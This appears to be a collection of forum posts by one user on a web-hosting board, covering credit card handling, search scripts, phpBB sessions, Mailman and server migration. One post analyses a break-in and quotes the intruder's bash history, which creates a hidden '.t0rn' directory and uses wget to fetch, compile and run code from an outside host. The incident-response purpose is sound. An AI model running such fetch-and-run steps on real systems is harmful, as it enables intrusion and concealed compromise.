snipe

I could be wrong here (and google isn't helping much at the moment), but I am fairly certain that (at least in the US) there was a law passed - or was about to be passed - about sending credit card information through cleartext via email. It was something about IF you're going to send CC#s, you have to X out all but the last 4 digits. Again, I may be wrong, but before you go ahead with this kind of option, you should check and make sure that its still legal to even do that. Otherwise you can use PHP to pipe your info directly through gpg or pgp (for email encyrption) - its not always as easy as it sounds, but it has been done before. Real-time auth is still always the best way to go, that way you never actually store the CC# anywhere on your server - ever. Takes the liability off of your shoulders and often makes the buyers more comfortable too.

digital_distortion - you can email me if you like. snipe AT snipe DOT net.

I don't know what kind of hosting account you have, but htdig is the search engine script I almost always use. http://www.htdig.org (You might not be able to install it if you don't have shell access, or at least you might need an admin's help from TCH) I would show you an example of it in use, but my server is currently being moved, so everything is down. Once its back up, you can see it in use at the following places tho: www.vactf.org www.caring4wildlife.com

you might also want to specifically warn users that they must disable their popup-blocking software in order to view the images. personally, I wouldn't use javascript popups simply because most popup blocking software can be "overidden" on a click by click basis by holding down the shift or control while clicking (depending on the program) - if javascript links are used, depending on how you code them, it will override the popup software, but the link won't launch properly since the actual "address" of the window is a ahref="javascript(foo)". Just my 2cents

append_sid() is a phpbb function that allows users who do not have cookies enabled to remain logged in by appending the session id to the url. You can learn more about it here: http://www.phpbb.com/kb/article.php?article_id=58

Well - I spent a little time screwing around, and I think we've backtracked their steps. Once we changed ls to actually show us the the truth (after they had changed it to lie), we backtracked their bash history, and lookee loo what we found... >cd /dev/shm mkdir .t0rn cd .t0rn ls uname -a wget nu.gs/~dragnet/checkint.c make checkint.c make checkint ./checkint rm *checkint* exit They left the script they used wget to grab on the webserver: http://nu.gs/~dragnet/checkint.c I think its time to open that trouble ticket... lol

I have been getting trojan horse warnings for the last few days. The message I get is: Hidden Pid detected! [pid 21736] hidden from ps: [yes] binary location: [/usr/sbin/xntps] When I do a manual scan for trojan horses through WHM, this is what I get: Appears Clean /dev/core /dev/srd0 /dev/stderr Scanning for Trojan Horses..... . . Possible Trojan - /sbin/syslogd

In the cpanel interface, I add a new mailing list - which gets added immediately - but then when I try to edit the list, I make the changes in the web-based Mailman admin forms and click "save", and yet the changes are never saved. Am I missing something? I do have cookies enabled, btw.

Hi all, I am shopping around for a new dedicated hosting solution, to move from ev1. I have a Cobalt RAQ there, and although I don't have any problems with ev1 per se, they are sold out of non-RAQ solutions - and I have just about run out of patience with this stupid RAQ. I just want a "normal" server again. So I have been shopping around, and TCH seems to be the best deal in town - and judging by the posts in here, it seems that everyone is pretty happy with your service, so I'm pretty well sold. My concern here is that I have about 80 sites that I have to transfer over once I have the TCH account, most of which use dynamic scripting, databases, etc. Anyone have any brilliant ideas on how to migrate this as painlessly as possible? What I figured I might do is set up subdomain DNS on the current machine, and direct it to the new TCH machine, so that I can upload and test without interrupting the normal sites until I'm ready to make them live. Does that sound like it makes sense? Any other suggestions? I have moved sites a hundred times before, but never on *this* level all by myself.